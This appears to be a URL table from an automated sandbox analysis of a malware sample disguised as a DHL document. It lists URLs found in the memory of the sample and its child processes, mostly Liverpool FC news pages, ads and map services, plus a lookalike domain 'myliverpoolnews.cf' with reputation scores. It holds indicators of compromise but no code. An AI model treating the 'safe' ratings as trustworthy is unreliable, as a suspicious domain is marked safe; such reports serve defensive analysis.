https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hulu.com/terms	svchost.exe, 00000023.00000003.461376428.000001EB103BA000.00000004.00000001.sdmp	false		high
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/liverpool-fc-news/	svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850	svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://appexmapsappupdate.blob.core.windows.net	svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	DHL_document11022020680908911.exe, 00000000.00000002.296377596.0000000002FF1000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 00000011.00000002.315276492.000002886D613000.00000004.00000001.sdmp	false		high
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false		high
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876	svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.hulu.com/do-not-sell-my-info	svchost.exe, 00000023.00000003.461376428.000001EB103BA000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000011.00000003.311553816.000002886D640000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000003.397779990.0000000007DAC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000003.397779990.0000000007DAC000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000011.00000002.315639072.000002886D63D000.00000004.00000001.sdmp	false		high
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166	svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst	svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://reachplc.hub.loginradius.com"	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://s2-prod.liverpool.com	svchost.exe, 00000017.00000003.404168763.0000000007BDB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000011.00000002.315276492.000002886D613000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.315639072.000002886D63D000.00000004.00000001.sdmp	false		high
https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816	svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000011.00000003.289025096.000002886D632000.00000004.00000001.sdmp	false		high
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000003.00000003.397779990.0000000007DAC000.00000004.00000001.sdmp	false		high
https://myliverpoolnews.cf4=k	DHL_document11022020680908911.exe, 00000000.00000002.296593502.0000000003035000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://i2-prod.liverpool.com	svchost.exe, 00000017.00000003.404168763.0000000007BDB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hulu.com/privacy	svchost.exe, 00000023.00000003.461376428.000001EB103BA000.00000004.00000001.sdmp	false		high
https://felix.data.tm-awx.com/felix.min.js	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000011.00000002.315980166.000002886D65C000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 00000011.00000003.310953123.000002886D64A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.311386179.000002886D65A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000003.240448674.0000000006EC2000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.371893373.00000000069B2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	false		high
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.	svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/all-about/ozan-kabak	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://s2-prod.mirror.co.uk/	svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-	DHL_document11022020680908911.exe, 00000000.00000002.296377596.0000000002FF1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/all-about/champions-league	svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/all-about/curtis-jones	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000011.00000002.315980166.000002886D65C000.00000004.00000001.sdmp	false		high
https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/all-about/steven-gerrard	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000003.240448674.0000000006EC2000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.371893373.00000000069B2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000011.00000002.315980166.000002886D65C000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000011.00000003.311386179.000002886D65A000.00000004.00000001.sdmp	false		high
https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616	svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391	svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schema.org/NewsArticle	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false		high
https://www.liverpool.com/schedule/	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schema.org/BreadcrumbList	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false		high
https://securepubads.g.doubleclick.net/tag/js/gpt.js	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000011.00000002.315639072.000002886D63D000.00000004.00000001.sdmp	false		high
https://s2-prod.liverpool.com/	svchost.exe, 00000017.00000003.404168763.0000000007BDB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194	svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 00000011.00000003.311767855.000002886D641000.00000004.00000001.sdmp	false		high
https://felix.data.tm-awx.com/ampconfig.json"	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.	svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
